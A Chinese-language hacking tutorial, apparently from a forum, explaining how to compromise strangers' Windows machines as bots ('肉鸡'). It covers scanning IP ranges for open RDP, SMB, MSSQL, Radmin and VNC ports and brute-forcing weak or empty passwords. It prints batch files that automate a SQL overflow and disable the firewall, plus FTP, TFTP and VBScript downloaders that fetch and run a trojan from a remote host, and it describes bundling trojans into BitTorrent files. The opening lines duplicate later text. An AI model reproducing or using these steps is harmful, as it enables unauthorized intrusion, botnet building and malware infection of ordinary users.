网络安全攻防目标:网络安全攻防实验室之抓肉鸡
网络安全攻防目标:网络安全攻防实验室之抓肉鸡可以去黑客网站搜索135)首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。2、扫135端口抓肉鸡
抓肉鸡的几种方法
找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!呵呵 这点就不用说了.............慢慢学
1、3389抓鸡
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new 密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针XP系统,如果遇到2000或者2003系统就不要试了
呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画
可以去黑客网站搜索135)
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫SQLhello.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描 溢出.bat文件
@echooff
for/f"eol=;tokens=1 2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
还要新建一个tt.txt,里面你要扫的IP段,格式为
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX 中间是空格
1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i
1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监
听的端口然后再写个批处理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(以2进制传输数据)
echogetxxx.exe(你的木马的文件名 要放在根目录下)>>daima.txt
echobye>>daima.txt
netstopsharedaccess(关闭WINDOWS自带防火墙)
ftp-s:daima.txt
xxx.exe(也是填你木马的文件名)
deldaima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
几种肉鸡上传文件的方法
tftp法
先在自己某机器上建个tftp服务器 如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行:tftp-i服务器ipgetsample.exe
ftp法
肉鸡cmd中执行:
echoOpenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget网站/sample.exe
利用dl.vbe法
肉鸡cmd中执行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get" .arguments(0) 0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1) 2:endwith>dl.vbe
cscriptdl.vbe*。*。*。*:88/sample.exesample.exe
利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET" iRemote 0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal 2>>iget.vbe
cscriptiget.vbe*。*。*。*/sample.exesample.exe
利用Http网站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET" "*.*.*.*/sample.exe" 0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe" 2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务
器上传很严格的机器特有效。(包括硬件防火墙)
先打开多个NC.bat 然后再打开扫描 溢出.bat 然后你就可以
去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下
马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也
可以这样溢出,只要用这些端口的溢出工具就好了,详细动画
可以去黑客网站搜索1433。
忘了说,上面的工具和批处理什么的都要放在同一个文件
夹下。
先休息一下,打这么多字累死了
继续
5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器X-scanSQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我
们可以用另一种方法。开了1433端口的机器一般都装了SQL,
所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为
文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描
参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了
,其他不要勾。然后在插件设置-端口相关设置-待检测端口这
一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会
有个报告,列出了有弱口令的机器,然后打开SQL综合利用工
具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-
利用目录,上传你的木马,然后在用DOS命令执行你的木马就
OK了。
6、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大
家知道下,呵呵。
工具:WINNTAutoAttackSQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下
的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA
账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马
执行就好了。
7、扫4899空口令抓肉鸡
工具:端口扫描器4899探测器Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测
器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有
空口令的机器,带开文件管理,上传的你木马运行就OK了。
详细动画可以去黑客网站搜索4899
8、扫5900端口抓VNC肉鸡
工具:VNC扫描器VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描
器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-
vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文
本文件,打开后有一列IP,IP后面的有一些单词比如
patched banned vulnerable 只有单词为vulnerable才能连接。接着
就用VNC连接器连接,下面就不用多说了吧?详细动画可以去
黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费
空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介
绍几种我会的。
1、BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在
很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。